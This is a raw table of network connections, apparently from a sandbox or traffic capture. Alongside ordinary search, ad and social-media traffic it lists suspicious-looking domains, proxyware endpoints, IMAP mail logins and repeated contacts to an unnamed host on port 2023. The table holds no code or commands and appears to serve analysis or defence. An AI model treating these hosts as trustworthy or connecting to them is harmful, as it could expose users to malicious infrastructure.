| US | 8.8.8.8:53 | www.google.com | udp |
| US | 172.67.213.47:443 | maxask.com | udp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| FR | 52.222.169.22:443 | platform-api.sharethis.com | tcp |
| GB | 142.250.179.238:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| GB | 142.250.187.238:443 | www.adsensecustomsearchads.com | udp |
| US | 8.8.8.8:53 | clients1.google.com | udp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| US | 8.8.8.8:53 | buttons-config.sharethis.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| IE | 34.242.6.0:443 | l.sharethis.com | tcp |
| FR | 52.222.149.89:443 | buttons-config.sharethis.com | tcp |
| US | 8.8.8.8:53 | datasphere-sbsvc.sharethis.com | udp |
| US | 18.245.175.125:443 | datasphere-sbsvc.sharethis.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 22.169.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.149.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.175.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.6.242.34.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | platform-cdn.sharethis.com | udp |
| FR | 52.222.201.52:443 | count-server.sharethis.com | tcp |
| FR | 216.137.52.117:443 | platform-cdn.sharethis.com | tcp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 117.52.137.216.in-addr.arpa | udp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | fayloobmennik.cloud | udp |
| RU | 31.184.194.236:443 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:443 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:443 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:80 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:80 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:80 | fayloobmennik.cloud | tcp |
| US | 104.21.9.132:443 | zamesoczxuswe.site | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| US | 172.67.213.47:443 | maxask.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 142.250.179.238:443 | cse.google.com | udp |
| FR | 52.222.149.89:443 | buttons-config.sharethis.com | tcp |
| IE | 34.242.6.0:443 | l.sharethis.com | tcp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| FR | 52.222.201.52:443 | count-server.sharethis.com | tcp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| US | 104.21.58.202:443 | api.peer2profit.global | tcp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| RU | 31.184.194.236:443 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:443 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:443 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:80 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:80 | fayloobmennik.cloud | tcp |
| RU | 31.184.194.236:80 | fayloobmennik.cloud | tcp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 172.67.213.47:443 | maxask.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.179.238:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | buttons-config.sharethis.com | udp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| US | 8.8.8.8:53 | 195.49.178.192.in-addr.arpa | udp |
| FR | 52.222.149.56:443 | buttons-config.sharethis.com | tcp |
| IE | 52.16.107.53:443 | l.sharethis.com | tcp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| US | 8.8.8.8:53 | datasphere-sbsvc.sharethis.com | udp |
| US | 18.245.175.4:443 | datasphere-sbsvc.sharethis.com | tcp |
| US | 8.8.8.8:53 | e2c70.gcp.gvt2.com | udp |
| CL | 34.0.63.29:443 | e2c70.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | platform-cdn.sharethis.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| FR | 52.222.169.28:443 | platform-cdn.sharethis.com | tcp |
| FR | 52.222.201.92:443 | count-server.sharethis.com | tcp |
| CL | 34.0.63.29:443 | e2c70.gcp.gvt2.com | tcp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 4.175.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.149.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.169.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.201.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.63.0.34.in-addr.arpa | udp |
| IE | 52.16.107.53:443 | l.sharethis.com | tcp |
| GB | 216.58.213.3:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | zippyshare.day | udp |
| US | 217.196.52.196:443 | zippyshare.day | tcp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 217.196.52.196:443 | zippyshare.day | udp |
| US | 8.8.8.8:53 | 196.52.196.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.bp.blogspot.com | udp |
| US | 8.8.8.8:53 | fileroy.com | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| GB | 142.250.180.1:443 | 1.bp.blogspot.com | tcp |
| RU | 93.158.134.119:443 | mc.yandex.ru | tcp |
| SG | 191.101.228.136:443 | fileroy.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| SG | 191.101.228.136:443 | fileroy.com | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | 119.134.158.93.in-addr.arpa | udp |
| GB | 142.250.187.226:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 136.228.101.191.in-addr.arpa | udp |
| US | 104.18.36.155:443 | dsum.casalemedia.com | udp |
| NL | 185.89.210.82:443 | ib.adnxs.com | tcp |
| GB | 142.250.187.226:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 8.8.8.8:53 | gtrace.mediago.io | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| NL | 35.214.168.80:443 | gtrace.mediago.io | tcp |
| US | 64.74.236.159:443 | b1sync.zemanta.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| IE | 63.34.207.242:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 54.225.219.192:443 | sync.srv.stackadapt.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | googleads4.g.doubleclick.net | udp |
| GB | 216.58.204.66:443 | googleads4.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | metric.picodi.global | udp |
| US | 140.82.62.143:443 | metric.picodi.global | tcp |
| US | 140.82.62.143:443 | metric.picodi.global | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | www.picodi.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| FR | 18.155.129.76:443 | www.picodi.com | tcp |
| US | 8.8.8.8:53 | 82.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.207.34.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.219.225.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.236.74.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.62.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| DE | 91.228.74.166:443 | cms.quantserve.com | tcp |
| US | 104.18.24.173:443 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | a.rfihub.com | udp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| DK | 37.157.5.133:443 | c1.adform.net | tcp |
| NL | 193.0.160.131:443 | a.rfihub.com | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 166.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.5.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| GB | 142.250.200.2:443 | ade.googlesyndication.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | dclk-match.dotomi.com | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| DK | 37.157.5.133:443 | c1.adform.net | tcp |
| US | 8.8.8.8:53 | dsp.adkernel.com | udp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| NL | 89.207.16.201:443 | dclk-match.dotomi.com | tcp |
| US | 34.96.105.8:443 | tr.blismedia.com | tcp |
| US | 174.137.133.49:443 | dsp.adkernel.com | tcp |
| DE | 91.228.74.166:443 | cms.quantserve.com | tcp |
| US | 64.74.236.159:443 | b1sync.zemanta.com | tcp |
| NL | 35.214.168.80:443 | gtrace.mediago.io | udp |
| NL | 35.214.168.80:443 | gtrace.mediago.io | tcp |
| US | 8.8.8.8:53 | 119.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.105.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| FR | 18.244.28.16:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| US | 8.8.8.8:53 | 16.28.244.18.in-addr.arpa | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | greevethul.com | udp |
| US | 8.8.8.8:53 | greevethul.com | udp |
| US | 104.21.1.251:443 | greevethul.com | udp |
| US | 104.21.1.251:443 | greevethul.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | choogeet.net | udp |
| US | 8.8.8.8:53 | choogeet.net | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| NL | 139.45.197.252:443 | choogeet.net | tcp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | jouteetu.net | udp |
| US | 8.8.8.8:53 | jouteetu.net | udp |
| US | 8.8.8.8:53 | amunfezanttor.com | udp |
| US | 8.8.8.8:53 | amunfezanttor.com | udp |
| NL | 139.45.197.251:443 | jouteetu.net | tcp |
| NL | 139.45.197.251:443 | jouteetu.net | tcp |
| NL | 139.45.197.251:443 | jouteetu.net | tcp |
| NL | 139.45.197.250:443 | amunfezanttor.com | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | 252.197.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.197.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.197.45.139.in-addr.arpa | udp |
| BE | 104.68.85.7:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | best.aliexpress.com | udp |
| US | 8.8.8.8:53 | mbest.aliexpress.com | udp |
| US | 8.8.8.8:53 | mbest.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| IE | 52.16.107.53:443 | l.sharethis.com | tcp |
| GB | 163.70.151.60:443 | web.whatsapp.com | tcp |
| GB | 163.70.151.60:443 | web.whatsapp.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | static.whatsapp.net | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| GB | 163.70.151.60:443 | static.whatsapp.net | tcp |
| GB | 163.70.151.60:443 | static.whatsapp.net | tcp |
| GB | 163.70.151.60:443 | static.whatsapp.net | tcp |
| GB | 163.70.151.60:443 | static.whatsapp.net | tcp |
| GB | 163.70.151.60:443 | static.whatsapp.net | tcp |
| GB | 163.70.151.60:443 | static.whatsapp.net | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| GB | 163.70.151.60:443 | static.whatsapp.net | udp |
| US | 8.8.8.8:53 | 60.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| GB | 163.70.151.60:443 | static.whatsapp.net | udp |
| GB | 163.70.151.60:443 | static.whatsapp.net | udp |
| US | 8.8.8.8:53 | graph.whatsapp.net | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 104.244.42.65:443 | x.com | tcp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| PL | 93.184.220.70:443 | pbs.twimg.com | tcp |
| US | 104.244.42.197:443 | t.co | tcp |
| US | 8.8.8.8:53 | 66.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.220.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | abs-0.twimg.com | udp |
| US | 68.232.34.217:443 | video.twimg.com | tcp |
| US | 104.244.43.131:443 | abs-0.twimg.com | tcp |
| US | 8.8.8.8:53 | 131.43.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.34.232.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 8.8.8.8:53 | monitor.repocket.com | udp |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| US | 8.8.8.8:53 | chat.maxask.com | udp |
| US | 104.21.35.42:443 | chat.maxask.com | tcp |
| US | 104.21.35.42:443 | chat.maxask.com | udp |
| US | 8.8.8.8:53 | api.maxthon.com | udp |
| US | 104.22.55.70:443 | api.maxthon.com | tcp |
| US | 104.22.55.70:443 | api.maxthon.com | tcp |
| US | 104.22.55.70:443 | api.maxthon.com | tcp |
| US | 8.8.8.8:53 | 70.55.22.104.in-addr.arpa | udp |
| HK | 208.87.200.146:443 | my.maxthon.com | tcp |
| HK | 208.87.200.146:443 | my.maxthon.com | tcp |
| HK | 208.87.200.146:443 | my.maxthon.com | udp |
| US | 8.8.8.8:53 | 146.200.87.208.in-addr.arpa | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 8.8.8.8:53 | tonline-search.com | udp |
| GB | 18.245.143.65:443 | tonline-search.com | tcp |
| GB | 18.245.143.65:443 | tonline-search.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| NL | 23.62.61.194:443 | th.bing.com | tcp |
| NL | 23.62.61.194:443 | th.bing.com | tcp |
| NL | 23.62.61.194:443 | th.bing.com | tcp |
| NL | 23.62.61.194:443 | th.bing.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | 65.143.245.18.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | th.bing.com | udp |
| NL | 40.126.32.68:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | aadcdn.msauth.net | udp |
| US | 13.107.246.64:443 | aadcdn.msauth.net | tcp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.179.238:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | buttons-config.sharethis.com | udp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| IE | 52.51.183.125:443 | l.sharethis.com | tcp |
| FR | 52.222.149.56:443 | buttons-config.sharethis.com | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | datasphere-sbsvc.sharethis.com | udp |
| US | 18.245.175.125:443 | datasphere-sbsvc.sharethis.com | tcp |
| US | 8.8.8.8:53 | platform-cdn.sharethis.com | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| FR | 52.222.169.28:443 | platform-cdn.sharethis.com | tcp |
| FR | 52.222.201.92:443 | count-server.sharethis.com | tcp |
| US | 104.22.55.70:443 | api.maxthon.com | tcp |
| FR | 18.244.28.16:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 2.17.251.5:443 | aefd.nelreports.net | tcp |
| US | 2.17.251.5:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 5.251.17.2.in-addr.arpa | udp |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| GB | 216.58.204.67:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.bingapis.com | udp |
| US | 13.107.5.80:443 | www.bingapis.com | tcp |
| US | 13.107.5.80:443 | www.bingapis.com | tcp |
| US | 13.107.5.80:443 | www.bingapis.com | tcp |
| US | 8.8.8.8:53 | sydney.bing.com | udp |
| NL | 23.62.61.97:443 | sydney.bing.com | tcp |
| US | 13.107.5.80:443 | www.bingapis.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 13.107.5.80:443 | www.bingapis.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | greevethul.com | udp |
| US | 8.8.8.8:53 | greevethul.com | udp |
| US | 104.21.1.251:443 | greevethul.com | udp |
| US | 104.21.1.251:443 | greevethul.com | tcp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | choogeet.net | udp |
| US | 8.8.8.8:53 | choogeet.net | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| NL | 139.45.197.252:443 | choogeet.net | tcp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | jouteetu.net | udp |
| US | 8.8.8.8:53 | jouteetu.net | udp |
| US | 8.8.8.8:53 | amunfezanttor.com | udp |
| US | 8.8.8.8:53 | amunfezanttor.com | udp |
| NL | 139.45.197.251:443 | jouteetu.net | tcp |
| NL | 139.45.197.251:443 | jouteetu.net | tcp |
| NL | 139.45.197.251:443 | jouteetu.net | tcp |
| NL | 139.45.197.250:443 | amunfezanttor.com | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| BE | 104.68.85.7:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | best.aliexpress.com | udp |
| US | 8.8.8.8:53 | best.aliexpress.com | udp |
| US | 8.8.8.8:53 | mbest.aliexpress.com | udp |
| US | 8.8.8.8:53 | mbest.aliexpress.com | udp |
| NL | 23.62.61.97:443 | sydney.bing.com | tcp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 13.107.5.80:443 | www.bingapis.com | tcp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 23.62.61.97:443 | sydney.bing.com | tcp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| BE | 104.68.92.92:80 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 23.62.61.97:443 | sydney.bing.com | udp |
| US | 8.8.8.8:53 | filetransfer.io | udp |
| US | 104.21.13.139:443 | filetransfer.io | tcp |
| US | 104.21.13.139:443 | filetransfer.io | tcp |
| US | 104.21.13.139:443 | filetransfer.io | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.166.156:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 156.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.13.21.104.in-addr.arpa | udp |
| US | 2.17.251.5:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | imap.web.de | udp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | pairdrop.net | udp |
| DE | 192.145.47.48:443 | pairdrop.net | tcp |
| DE | 192.145.47.48:443 | pairdrop.net | tcp |
| US | 8.8.8.8:53 | 48.47.145.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.16.234:443 | content-autofill.googleapis.com | udp |
| DE | 192.145.47.48:443 | pairdrop.net | tcp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| DE | 192.145.47.48:443 | pairdrop.net | tcp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | s.youtube.com | udp |
| BE | 74.125.206.100:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.sharedrop.io | udp |
| US | 8.8.8.8:53 | 100.206.125.74.in-addr.arpa | udp |
| US | 104.21.35.225:443 | www.sharedrop.io | tcp |
| US | 104.21.35.225:443 | www.sharedrop.io | tcp |
| US | 104.21.35.225:443 | www.sharedrop.io | udp |
| US | 8.8.8.8:53 | cdn.firebase.com | udp |
| US | 151.101.1.195:443 | cdn.firebase.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.4.4:443 | dns.google | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | sharedrop.firebaseio.com | udp |
| US | 34.120.206.254:443 | sharedrop.firebaseio.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | 225.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| PL | 93.184.220.66:443 | platform.twitter.com | tcp |
| SE | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 104.244.42.8:443 | syndication.twitter.com | tcp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 66.220.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.42.244.104.in-addr.arpa | udp |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 163.70.151.174:443 | www.instagram.com | tcp |
